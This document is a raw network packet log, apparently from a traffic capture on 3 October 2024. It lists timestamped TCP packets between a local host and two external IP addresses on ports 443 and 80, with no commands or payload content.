                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.271836996 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.271843910 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.271879911 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.272922993 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.272939920 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.272999048 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.273004055 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.273040056 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.281738997 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.281754971 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.281871080 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.281878948 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.281927109 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.286484003 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.286505938 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.286540031 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.286545992 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.286571980 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.286587000 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.296945095 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.296962023 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.297008991 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.297018051 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.297036886 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.297055006 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.319521904 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.319544077 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.319596052 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.319610119 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.319621086 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.319647074 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.349814892 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.349839926 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.349877119 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.349885941 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.349910021 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.349924088 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.359410048 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.359477997 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.359487057 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.359508038 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.359533072 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.359550953 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360052109 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360094070 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360121012 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360127926 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360146046 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360167027 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360740900 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360785007 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360807896 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360815048 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360837936 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.360851049 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.373848915 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.373869896 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.373948097 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.373971939 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.374022007 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.381036997 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.381057978 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.381154060 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.381175041 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.381223917 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.384766102 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.384783030 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.384855032 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.384864092 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.384902000 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.406979084 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.407000065 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.407080889 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.407104969 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.407155037 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.437640905 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.437659025 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.437732935 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.437750101 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.437807083 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.446983099 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447026014 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447068930 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447084904 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447118044 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447160959 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447880983 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447923899 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447947979 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447953939 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447979927 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.447993994 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.448596001 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.448641062 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.448664904 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.448671103 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.448695898 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.448709011 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.461604118 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.461651087 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.461685896 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.461697102 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.461719990 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.461774111 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.469113111 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.469157934 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.469192982 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.469199896 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.469221115 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.469235897 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.493988037 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494008064 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494107008 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494118929 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494158030 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494824886 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494853020 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494899988 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494905949 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494931936 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.494946957 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.525484085 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.525502920 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.525613070 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.525623083 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.525667906 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534327030 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534373999 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534416914 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534435034 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534435034 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534467936 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534889936 CEST56252443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.534909964 CEST4435625249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.811101913 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.811148882 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.811214924 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.811563969 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:00.811582088 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.488744020 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.488986015 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.507733107 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.507740021 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.516067982 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.516073942 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.516242981 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:01.516248941 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.218924046 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.218965054 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.219408035 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.219408035 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.219436884 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.380682945 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.380770922 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.380899906 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.380899906 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.381879091 CEST56253443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.381894112 CEST4435625349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.867371082 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.867486954 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.868125916 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.868132114 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.869986057 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:02.869991064 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559145927 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559185982 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559294939 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559308052 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559319973 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559370041 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559370041 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559407949 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559921980 CEST56254443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.559937954 CEST4435625449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.562401056 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.562455893 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.562606096 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.562836885 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:03.562853098 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.205625057 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.205708027 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.206172943 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.206185102 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.207972050 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.207978964 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922718048 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922779083 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922826052 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922847033 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922867060 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922882080 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922946930 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.922996044 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.923154116 CEST56255443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.923171997 CEST4435625549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.942687035 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.942751884 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.942851067 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.943080902 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:04.943110943 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:05.605638981 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:05.605832100 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:05.606343031 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:05.606350899 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:05.607966900 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:05.607973099 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.294011116 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.294173956 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.294218063 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.294266939 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.295773029 CEST56256443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.295798063 CEST4435625649.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.993927956 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.993972063 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.994050026 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.994303942 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:06.994311094 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.639657974 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.639806986 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.679266930 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.679279089 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.728257895 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.728266954 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.728311062 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.728327036 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.728331089 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.728334904 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.756735086 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.756757021 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.756858110 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.757096052 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.761187077 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.761198044 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.761214972 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.761224985 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.761249065 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:07.761276960 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.065428972 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.065499067 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.065502882 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.065562963 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.065787077 CEST56257443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.065805912 CEST4435625749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.070729017 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.070753098 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.070894957 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.071244955 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.071259022 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.807627916 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.807815075 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.808753014 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.808760881 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.810884953 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:09.810894012 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.491372108 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.491563082 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.491571903 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.491703987 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.491746902 CEST56258443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.491765976 CEST4435625849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.502830029 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.507760048 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.507855892 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.507978916 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:10.512861013 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774779081 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774811983 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774825096 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774836063 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774847984 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774858952 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774871111 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774883032 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774919987 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:15.774920940 CEST5625980192.168.2.8147.45.44.104
